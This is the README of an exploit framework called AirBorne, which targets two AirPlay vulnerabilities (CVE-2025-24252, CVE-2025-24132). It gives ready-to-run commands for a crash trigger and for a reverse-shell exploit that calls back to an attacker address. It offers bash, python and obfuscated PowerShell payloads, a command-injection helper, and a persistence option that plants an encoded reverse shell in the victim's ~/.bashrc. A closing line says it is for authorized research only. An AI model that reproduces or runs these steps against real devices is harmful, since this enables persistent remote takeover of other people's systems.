
poc for CVE-2025-24252 & CVE-2025-24132
Full PoC Framework for CVE-2025-24252 & CVE-2025-24132
By ekomsSavior |
AirBorne is a combined proof-of-concept (PoC) framework targeting two serious vulnerabilities in Apple's AirPlay service. It includes a full crash trigger and a working reverse shell exploit with optional persistence, listener, and multiple payload formats — all in one script.
Looking for the original version?
The legacy edition is still available in thelegacybranch of this repository.
To check it out:
git checkout legacy
.bashrc injection (Linux)git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
The single script airborne.py includes both PoCs and all logic:
--exploit--payload--persistentsudo python3 airborne.py --exploit 24252 --interface wlan0
Requires an interface in monitor mode.
Start full exploit with default bash shell:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
Choose Python shell instead:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Enable real persistence on Linux targets:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
Only shell command einjection
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | Description |
|---|---|
bash | Default bash reverse shell over TCP |
python | Python-based reverse shell using socket and pty |
powershell | Full Windows PowerShell RCE payload (obfuscated) |
When using --persistent, the script will append the encoded reverse shell payload to the target’s:
~/.bashrc
This ensures a shell is returned to you each time the user logs in or a terminal is spawned.
base64 and delivered after buffer overflowThis project is intended for educational, ethical, and authorized research only.
Unauthorized exploitation of systems is illegal and unethical.